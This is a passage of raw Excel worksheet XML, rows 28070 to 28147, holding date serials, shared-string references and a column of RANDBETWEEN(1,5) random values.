        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28070" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28070" s="1">
        <v>42862.992824074077</v>
      </c>
      <c r="C28070" t="s">
        <v>140</v>
      </c>
      <c r="D28070" t="s">
        <v>141</v>
      </c>
      <c r="E28070" t="s">
        <v>25557</v>
      </c>
      <c r="F28070">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28071" s="1">
        <v>42862.991493055553</v>
      </c>
      <c r="C28071" t="s">
        <v>41</v>
      </c>
      <c r="E28071" t="s">
        <v>25558</v>
      </c>
      <c r="F28071">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28072" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28072" s="1">
        <v>42862.955879629626</v>
      </c>
      <c r="C28072" t="s">
        <v>260</v>
      </c>
      <c r="E28072" t="s">
        <v>25559</v>
      </c>
      <c r="F28072">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28073" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28073" s="1">
        <v>42862.954004629632</v>
      </c>
      <c r="C28073" t="s">
        <v>73</v>
      </c>
      <c r="E28073" t="s">
        <v>25560</v>
      </c>
      <c r="F28073">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28074" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28074" s="1">
        <v>42862.899664351855</v>
      </c>
      <c r="C28074" t="s">
        <v>410</v>
      </c>
      <c r="E28074" t="s">
        <v>25561</v>
      </c>
      <c r="F28074">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28075" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28075" s="1">
        <v>42862.88690972222</v>
      </c>
      <c r="C28075" t="s">
        <v>71</v>
      </c>
      <c r="E28075" t="s">
        <v>25562</v>
      </c>
      <c r="F28075">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28076" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28076" s="1">
        <v>42862.833692129629</v>
      </c>
      <c r="C28076" t="s">
        <v>140</v>
      </c>
      <c r="D28076" t="s">
        <v>8765</v>
      </c>
      <c r="E28076" s="2" t="s">
        <v>25563</v>
      </c>
      <c r="F28076">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28077" s="1">
        <v>42862.807129629633</v>
      </c>
      <c r="C28077" t="s">
        <v>140</v>
      </c>
      <c r="D28077" t="s">
        <v>234</v>
      </c>
      <c r="E28077" t="s">
        <v>25564</v>
      </c>
      <c r="F28077">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28078" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28078" s="1">
        <v>42862.741608796299</v>
      </c>
      <c r="C28078" t="s">
        <v>140</v>
      </c>
      <c r="D28078" t="s">
        <v>234</v>
      </c>
      <c r="E28078" s="2" t="s">
        <v>25565</v>
      </c>
      <c r="F28078">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28079" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28079" s="1">
        <v>42862.545162037037</v>
      </c>
      <c r="C28079" t="s">
        <v>6</v>
      </c>
      <c r="D28079" t="s">
        <v>25</v>
      </c>
      <c r="E28079" s="2" t="s">
        <v>25566</v>
      </c>
      <c r="F28079">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28080" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28080" s="1">
        <v>42862.490335648145</v>
      </c>
      <c r="C28080" t="s">
        <v>314</v>
      </c>
      <c r="E28080" t="s">
        <v>25567</v>
      </c>
      <c r="F28080">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28081" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28081" s="1">
        <v>42862.480208333334</v>
      </c>
      <c r="C28081" t="s">
        <v>10</v>
      </c>
      <c r="D28081" t="s">
        <v>107</v>
      </c>
      <c r="E28081" t="s">
        <v>25568</v>
      </c>
      <c r="F28081">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28082" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28082" s="1">
        <v>42862.425000000003</v>
      </c>
      <c r="C28082" t="s">
        <v>163</v>
      </c>
      <c r="E28082" s="2" t="s">
        <v>25569</v>
      </c>
      <c r="F28082">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28083" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28083" s="1">
        <v>42861.64371527778</v>
      </c>
      <c r="C28083" t="s">
        <v>139</v>
      </c>
      <c r="E28083" s="2" t="s">
        <v>25570</v>
      </c>
      <c r="F28083">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28084" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A28084" s="1">
        <v>42861.623020833336</v>
      </c>
      <c r="C28084" t="s">
        <v>10</v>
      </c>
      <c r="D28084" t="s">
        <v>56</v>
      </c>
      <c r="E28084" s="2" t="s">
        <v>25571</v>
      </c>
      <c r="F28084">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28085" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28085" s="1">
        <v>42861.570347222223</v>
      </c>
      <c r="C28085" t="s">
        <v>10</v>
      </c>
      <c r="D28085" t="s">
        <v>6</v>
      </c>
      <c r="E28085" s="2" t="s">
        <v>25572</v>
      </c>
      <c r="F28085">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28086" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A28086" s="1">
        <v>42861.279745370368</v>
      </c>
      <c r="C28086" t="s">
        <v>10</v>
      </c>
      <c r="D28086" t="s">
        <v>667</v>
      </c>
      <c r="E28086" s="2" t="s">
        <v>25573</v>
      </c>
      <c r="F28086">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28087" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A28087" s="1">
        <v>42861.254131944443</v>
      </c>
      <c r="C28087" t="s">
        <v>71</v>
      </c>
      <c r="E28087" s="2" t="s">
        <v>25574</v>
      </c>
      <c r="F28087">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28088" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28088" s="1">
        <v>42860.788553240738</v>
      </c>
      <c r="C28088" t="s">
        <v>10</v>
      </c>
      <c r="D28088" t="s">
        <v>89</v>
      </c>
      <c r="E28088" s="2" t="s">
        <v>25575</v>
      </c>
      <c r="F28088">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28089" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28089" s="1">
        <v>42860.730682870373</v>
      </c>
      <c r="C28089" t="s">
        <v>10</v>
      </c>
      <c r="D28089" t="s">
        <v>6</v>
      </c>
      <c r="E28089" s="2" t="s">
        <v>25576</v>
      </c>
      <c r="F28089">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28090" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28090" s="1">
        <v>42860.72792824074</v>
      </c>
      <c r="C28090" t="s">
        <v>10</v>
      </c>
      <c r="D28090" t="s">
        <v>6</v>
      </c>
      <c r="E28090" t="s">
        <v>25577</v>
      </c>
      <c r="F28090">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28091" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28091" s="1">
        <v>42860.708333333336</v>
      </c>
      <c r="C28091" t="s">
        <v>10</v>
      </c>
      <c r="D28091" t="s">
        <v>163</v>
      </c>
      <c r="E28091" t="s">
        <v>25578</v>
      </c>
      <c r="F28091">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28092" s="1">
        <v>42860.693124999998</v>
      </c>
      <c r="C28092" t="s">
        <v>10</v>
      </c>
      <c r="D28092" t="s">
        <v>80</v>
      </c>
      <c r="E28092" t="s">
        <v>25579</v>
      </c>
      <c r="F28092">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28093" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28093" s="1">
        <v>42860.603981481479</v>
      </c>
      <c r="C28093" t="s">
        <v>10</v>
      </c>
      <c r="D28093" t="s">
        <v>17</v>
      </c>
      <c r="E28093" s="2" t="s">
        <v>25580</v>
      </c>
      <c r="F28093">
        <f t="shared" ca="1" si="438"/>
        <v>4</v>
      </c>
    </row>
    <row r="28094" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28094" s="1">
        <v>42860.595775462964</v>
      </c>
      <c r="C28094" t="s">
        <v>10</v>
      </c>
      <c r="D28094" t="s">
        <v>178</v>
      </c>
      <c r="E28094" t="s">
        <v>25581</v>
      </c>
      <c r="F28094">
        <f t="shared" ca="1" si="438"/>
        <v>3</v>
      </c>
    </row>
    <row r="28095" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28095" s="1">
        <v>42860.59207175926</v>
      </c>
      <c r="C28095" t="s">
        <v>10</v>
      </c>
      <c r="D28095" t="s">
        <v>192</v>
      </c>
      <c r="E28095" s="2" t="s">
        <v>25582</v>
      </c>
      <c r="F28095">
        <f t="shared" ca="1" si="438"/>
        <v>2</v>
      </c>
    </row>
    <row r="28096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28096" s="1">
        <v>42860.578182870369</v>
      </c>
      <c r="C28096" t="s">
        <v>10</v>
      </c>
      <c r="D28096" t="s">
        <v>6</v>
      </c>
      <c r="E28096" t="s">
        <v>25583</v>
      </c>
      <c r="F28096">
        <f t="shared" ca="1" si="438"/>
        <v>1</v>
      </c>
    </row>
    <row r="28097" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28097" s="1">
        <v>42860.575613425928</v>
      </c>
      <c r="C28097" t="s">
        <v>1050</v>
      </c>
      <c r="E28097" t="s">
        <v>25584</v>
      </c>
      <c r="F28097">
        <f t="shared" ca="1" si="438"/>
        <v>5</v>
      </c>
    </row>
    <row r="28098" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28098" s="1">
        <v>42860.503506944442</v>
      </c>
      <c r="C28098" t="s">
        <v>10</v>
      </c>
      <c r="D28098" t="s">
        <v>80</v>
      </c>
      <c r="E28098" s="2" t="s">
        <v>25585</v>
      </c>
      <c r="F28098">
        <f t="shared" ref="F28098:F28161" ca="1" si="439">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="28099" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28099" s="1">
        <v>42860.478854166664</v>
      </c>
      <c r="C28099" t="s">
        <v>10</v>
      </c>
      <c r="D28099" t="s">
        <v>271</v>
      </c>
      <c r="E28099" t="s">
        <v>25586</v>
      </c>
      <c r="F28099">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28100" s="1">
        <v>42860.456574074073</v>
      </c>
      <c r="C28100" t="s">
        <v>48</v>
      </c>
      <c r="E28100" t="s">
        <v>25587</v>
      </c>
      <c r="F28100">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28101" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28101" s="1">
        <v>42860.447268518517</v>
      </c>
      <c r="C28101" t="s">
        <v>10</v>
      </c>
      <c r="D28101" t="s">
        <v>263</v>
      </c>
      <c r="E28101" s="2" t="s">
        <v>25588</v>
      </c>
      <c r="F28101">
        <f t="shared" ca="1" si="439"/>
        <v>5</v>
      </c>
    </row>
    <row r="28102" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A28102" s="1">
        <v>42860.433194444442</v>
      </c>
      <c r="C28102" t="s">
        <v>10</v>
      </c>
      <c r="D28102" t="s">
        <v>6</v>
      </c>
      <c r="E28102" s="2" t="s">
        <v>25589</v>
      </c>
      <c r="F28102">
        <f t="shared" ca="1" si="439"/>
        <v>2</v>
      </c>
    </row>
    <row r="28103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28103" s="1">
        <v>42860.430428240739</v>
      </c>
      <c r="C28103" t="s">
        <v>260</v>
      </c>
      <c r="E28103" t="s">
        <v>25590</v>
      </c>
      <c r="F28103">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28104" s="1">
        <v>42860.385000000002</v>
      </c>
      <c r="C28104" t="s">
        <v>71</v>
      </c>
      <c r="E28104" t="s">
        <v>25591</v>
      </c>
      <c r="F28104">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28105" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28105" s="1">
        <v>42860.343217592592</v>
      </c>
      <c r="C28105" t="s">
        <v>2545</v>
      </c>
      <c r="E28105" s="2" t="s">
        <v>25592</v>
      </c>
      <c r="F28105">
        <f t="shared" ca="1" si="439"/>
        <v>5</v>
      </c>
    </row>
    <row r="28106" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28106" s="1">
        <v>42860.323495370372</v>
      </c>
      <c r="C28106" t="s">
        <v>10</v>
      </c>
      <c r="D28106" t="s">
        <v>192</v>
      </c>
      <c r="E28106" s="2" t="s">
        <v>25593</v>
      </c>
      <c r="F28106">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28107" s="1">
        <v>42860.272766203707</v>
      </c>
      <c r="C28107" t="s">
        <v>10</v>
      </c>
      <c r="D28107" t="s">
        <v>89</v>
      </c>
      <c r="E28107" t="s">
        <v>25594</v>
      </c>
      <c r="F28107">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28108" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A28108" s="1">
        <v>42860.238564814812</v>
      </c>
      <c r="C28108" t="s">
        <v>845</v>
      </c>
      <c r="E28108" s="2" t="s">
        <v>25595</v>
      </c>
      <c r="F28108">
        <f t="shared" ca="1" si="439"/>
        <v>2</v>
      </c>
    </row>
    <row r="28109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28109" s="1">
        <v>42860.230219907404</v>
      </c>
      <c r="C28109" t="s">
        <v>69</v>
      </c>
      <c r="F28109">
        <f t="shared" ca="1" si="439"/>
        <v>5</v>
      </c>
    </row>
    <row r="28110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28110" s="1">
        <v>42860.184664351851</v>
      </c>
      <c r="C28110" t="s">
        <v>60</v>
      </c>
      <c r="E28110" t="s">
        <v>25596</v>
      </c>
      <c r="F28110">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28111" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28111" s="1">
        <v>42860.160046296296</v>
      </c>
      <c r="C28111" t="s">
        <v>140</v>
      </c>
      <c r="D28111" t="s">
        <v>197</v>
      </c>
      <c r="E28111" t="s">
        <v>25597</v>
      </c>
      <c r="F28111">
        <f t="shared" ca="1" si="439"/>
        <v>2</v>
      </c>
    </row>
    <row r="28112" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28112" s="1">
        <v>42860.150381944448</v>
      </c>
      <c r="C28112" t="s">
        <v>139</v>
      </c>
      <c r="E28112" t="s">
        <v>25598</v>
      </c>
      <c r="F28112">
        <f t="shared" ca="1" si="439"/>
        <v>5</v>
      </c>
    </row>
    <row r="28113" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28113" s="1">
        <v>42860.01667824074</v>
      </c>
      <c r="C28113" t="s">
        <v>10</v>
      </c>
      <c r="D28113" t="s">
        <v>80</v>
      </c>
      <c r="E28113" s="2" t="s">
        <v>25599</v>
      </c>
      <c r="F28113">
        <f t="shared" ca="1" si="439"/>
        <v>1</v>
      </c>
    </row>
    <row r="28114" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28114" s="1">
        <v>42859.891365740739</v>
      </c>
      <c r="C28114" t="s">
        <v>10</v>
      </c>
      <c r="D28114" t="s">
        <v>112</v>
      </c>
      <c r="E28114" t="s">
        <v>25600</v>
      </c>
      <c r="F28114">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28115" s="1">
        <v>42859.822743055556</v>
      </c>
      <c r="C28115" t="s">
        <v>60</v>
      </c>
      <c r="E28115" t="s">
        <v>25601</v>
      </c>
      <c r="F28115">
        <f t="shared" ca="1" si="439"/>
        <v>2</v>
      </c>
    </row>
    <row r="28116" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28116" s="1">
        <v>42859.808692129627</v>
      </c>
      <c r="C28116" t="s">
        <v>144</v>
      </c>
      <c r="E28116" s="2" t="s">
        <v>25602</v>
      </c>
      <c r="F28116">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28117" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A28117" s="1">
        <v>42859.763310185182</v>
      </c>
      <c r="C28117" t="s">
        <v>10</v>
      </c>
      <c r="D28117" t="s">
        <v>20</v>
      </c>
      <c r="E28117" s="2" t="s">
        <v>25603</v>
      </c>
      <c r="F28117">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28118" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A28118" s="1">
        <v>42859.742673611108</v>
      </c>
      <c r="C28118" t="s">
        <v>48</v>
      </c>
      <c r="E28118" s="2" t="s">
        <v>25604</v>
      </c>
      <c r="F28118">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28119" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28119" s="1">
        <v>42859.705034722225</v>
      </c>
      <c r="C28119" t="s">
        <v>6</v>
      </c>
      <c r="D28119" t="s">
        <v>114</v>
      </c>
      <c r="E28119" s="2" t="s">
        <v>25605</v>
      </c>
      <c r="F28119">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28120" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28120" s="1">
        <v>42859.703055555554</v>
      </c>
      <c r="C28120" t="s">
        <v>10</v>
      </c>
      <c r="D28120" t="s">
        <v>6</v>
      </c>
      <c r="E28120" t="s">
        <v>25606</v>
      </c>
      <c r="F28120">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28121" s="1">
        <v>42859.698761574073</v>
      </c>
      <c r="C28121" t="s">
        <v>10</v>
      </c>
      <c r="D28121" t="s">
        <v>23</v>
      </c>
      <c r="E28121" t="s">
        <v>25607</v>
      </c>
      <c r="F28121">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28122" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28122" s="1">
        <v>42859.666192129633</v>
      </c>
      <c r="C28122" t="s">
        <v>10</v>
      </c>
      <c r="D28122" t="s">
        <v>178</v>
      </c>
      <c r="E28122" s="2" t="s">
        <v>25608</v>
      </c>
      <c r="F28122">
        <f t="shared" ca="1" si="439"/>
        <v>1</v>
      </c>
    </row>
    <row r="28123" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28123" s="1">
        <v>42859.635833333334</v>
      </c>
      <c r="C28123" t="s">
        <v>16</v>
      </c>
      <c r="E28123" t="s">
        <v>25609</v>
      </c>
      <c r="F28123">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28124" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28124" s="1">
        <v>42859.63349537037</v>
      </c>
      <c r="C28124" t="s">
        <v>10</v>
      </c>
      <c r="D28124" t="s">
        <v>192</v>
      </c>
      <c r="E28124" t="s">
        <v>25610</v>
      </c>
      <c r="F28124">
        <f t="shared" ca="1" si="439"/>
        <v>2</v>
      </c>
    </row>
    <row r="28125" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28125" s="1">
        <v>42859.624502314815</v>
      </c>
      <c r="C28125" t="s">
        <v>10</v>
      </c>
      <c r="D28125" t="s">
        <v>94</v>
      </c>
      <c r="E28125" t="s">
        <v>25611</v>
      </c>
      <c r="F28125">
        <f t="shared" ca="1" si="439"/>
        <v>5</v>
      </c>
    </row>
    <row r="28126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28126" s="1">
        <v>42859.589733796296</v>
      </c>
      <c r="C28126" t="s">
        <v>10</v>
      </c>
      <c r="D28126" t="s">
        <v>271</v>
      </c>
      <c r="E28126" t="s">
        <v>25612</v>
      </c>
      <c r="F28126">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28127" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28127" s="1">
        <v>42859.580023148148</v>
      </c>
      <c r="C28127" t="s">
        <v>10</v>
      </c>
      <c r="D28127" t="s">
        <v>89</v>
      </c>
      <c r="E28127" s="2" t="s">
        <v>25613</v>
      </c>
      <c r="F28127">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28128" s="1">
        <v>42859.574259259258</v>
      </c>
      <c r="C28128" t="s">
        <v>6</v>
      </c>
      <c r="D28128" t="s">
        <v>114</v>
      </c>
      <c r="E28128" t="s">
        <v>25614</v>
      </c>
      <c r="F28128">
        <f t="shared" ca="1" si="439"/>
        <v>2</v>
      </c>
    </row>
    <row r="28129" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28129" s="1">
        <v>42859.569745370369</v>
      </c>
      <c r="C28129" t="s">
        <v>10</v>
      </c>
      <c r="D28129" t="s">
        <v>6</v>
      </c>
      <c r="E28129" s="2" t="s">
        <v>25615</v>
      </c>
      <c r="F28129">
        <f t="shared" ca="1" si="439"/>
        <v>5</v>
      </c>
    </row>
    <row r="28130" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A28130" s="1">
        <v>42859.515266203707</v>
      </c>
      <c r="C28130" t="s">
        <v>10</v>
      </c>
      <c r="D28130" t="s">
        <v>36</v>
      </c>
      <c r="E28130" s="2" t="s">
        <v>25616</v>
      </c>
      <c r="F28130">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28131" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A28131" s="1">
        <v>42859.510428240741</v>
      </c>
      <c r="C28131" t="s">
        <v>10</v>
      </c>
      <c r="D28131" t="s">
        <v>33</v>
      </c>
      <c r="E28131" s="2" t="s">
        <v>25617</v>
      </c>
      <c r="F28131">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28132" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28132" s="1">
        <v>42859.496504629627</v>
      </c>
      <c r="C28132" t="s">
        <v>10</v>
      </c>
      <c r="D28132" t="s">
        <v>89</v>
      </c>
      <c r="E28132" s="2" t="s">
        <v>25618</v>
      </c>
      <c r="F28132">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28133" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28133" s="1">
        <v>42859.462245370371</v>
      </c>
      <c r="C28133" t="s">
        <v>107</v>
      </c>
      <c r="E28133" t="s">
        <v>25619</v>
      </c>
      <c r="F28133">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28134" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28134" s="1">
        <v>42859.4531712963</v>
      </c>
      <c r="C28134" t="s">
        <v>430</v>
      </c>
      <c r="E28134" s="2" t="s">
        <v>25620</v>
      </c>
      <c r="F28134">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28135" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28135" s="1">
        <v>42859.420081018521</v>
      </c>
      <c r="C28135" t="s">
        <v>10</v>
      </c>
      <c r="D28135" t="s">
        <v>36</v>
      </c>
      <c r="E28135" s="2" t="s">
        <v>25621</v>
      </c>
      <c r="F28135">
        <f t="shared" ca="1" si="439"/>
        <v>2</v>
      </c>
    </row>
    <row r="28136" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28136" s="1">
        <v>42859.419594907406</v>
      </c>
      <c r="C28136" t="s">
        <v>41</v>
      </c>
      <c r="E28136" t="s">
        <v>25622</v>
      </c>
      <c r="F28136">
        <f t="shared" ca="1" si="439"/>
        <v>2</v>
      </c>
    </row>
    <row r="28137" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28137" s="1">
        <v>42859.387303240743</v>
      </c>
      <c r="C28137" t="s">
        <v>6</v>
      </c>
      <c r="D28137" t="s">
        <v>124</v>
      </c>
      <c r="E28137" t="s">
        <v>25623</v>
      </c>
      <c r="F28137">
        <f t="shared" ca="1" si="439"/>
        <v>2</v>
      </c>
    </row>
    <row r="28138" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28138" s="1">
        <v>42859.379837962966</v>
      </c>
      <c r="C28138" t="s">
        <v>1931</v>
      </c>
      <c r="E28138" s="2" t="s">
        <v>25624</v>
      </c>
      <c r="F28138">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28139" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28139" s="1">
        <v>42859.371608796297</v>
      </c>
      <c r="C28139" t="s">
        <v>10</v>
      </c>
      <c r="D28139" t="s">
        <v>71</v>
      </c>
      <c r="E28139" s="2" t="s">
        <v>25625</v>
      </c>
      <c r="F28139">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28140" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28140" s="1">
        <v>42859.368287037039</v>
      </c>
      <c r="C28140" t="s">
        <v>10</v>
      </c>
      <c r="D28140" t="s">
        <v>290</v>
      </c>
      <c r="E28140" t="s">
        <v>25626</v>
      </c>
      <c r="F28140">
        <f t="shared" ca="1" si="439"/>
        <v>1</v>
      </c>
    </row>
    <row r="28141" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28141" s="1">
        <v>42859.362523148149</v>
      </c>
      <c r="C28141" t="s">
        <v>6</v>
      </c>
      <c r="D28141" t="s">
        <v>25</v>
      </c>
      <c r="E28141" s="2" t="s">
        <v>25627</v>
      </c>
      <c r="F28141">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28142" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28142" s="1">
        <v>42859.29241898148</v>
      </c>
      <c r="C28142" t="s">
        <v>197</v>
      </c>
      <c r="E28142" s="2" t="s">
        <v>25628</v>
      </c>
      <c r="F28142">
        <f t="shared" ca="1" si="439"/>
        <v>4</v>
      </c>
    </row>
    <row r="28143" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28143" s="1">
        <v>42859.288726851853</v>
      </c>
      <c r="C28143" t="s">
        <v>535</v>
      </c>
      <c r="E28143" t="s">
        <v>25629</v>
      </c>
      <c r="F28143">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28144" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28144" s="1">
        <v>42859.288564814815</v>
      </c>
      <c r="C28144" t="s">
        <v>41</v>
      </c>
      <c r="E28144" t="s">
        <v>25630</v>
      </c>
      <c r="F28144">
        <f t="shared" ca="1" si="439"/>
        <v>3</v>
      </c>
    </row>
    <row r="28145" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28145" s="1">
        <v>42859.261956018519</v>
      </c>
      <c r="C28145" t="s">
        <v>71</v>
      </c>
      <c r="E28145" t="s">
        <v>25631</v>
      </c>
      <c r="F28145">
        <f t="shared" ca="1" si="439"/>
        <v>5</v>
      </c>
    </row>
    <row r="28146" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28146" s="1">
        <v>42859.251967592594</v>
      </c>
      <c r="C28146" t="s">
        <v>73</v>
      </c>
      <c r="E28146" s="2" t="s">
        <v>25632</v>
      </c>
      <c r="F28146">
        <f t="shared" ca="1" si="439"/>
        <v>5</v>
      </c>
    </row>
    <row r="28147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28147" s="1">
        <v>42859.198692129627</v>
      </c>
      <c r="C28147" t="s">
        <v>71</v>
      </c>
      <c r="E28147" t="s">
        <v>25633</v>
      </c>
      <c r="F28147">
        <f t="shared" ca="1" si="439"/>
        <v>1</v>
      </c>
    </row>
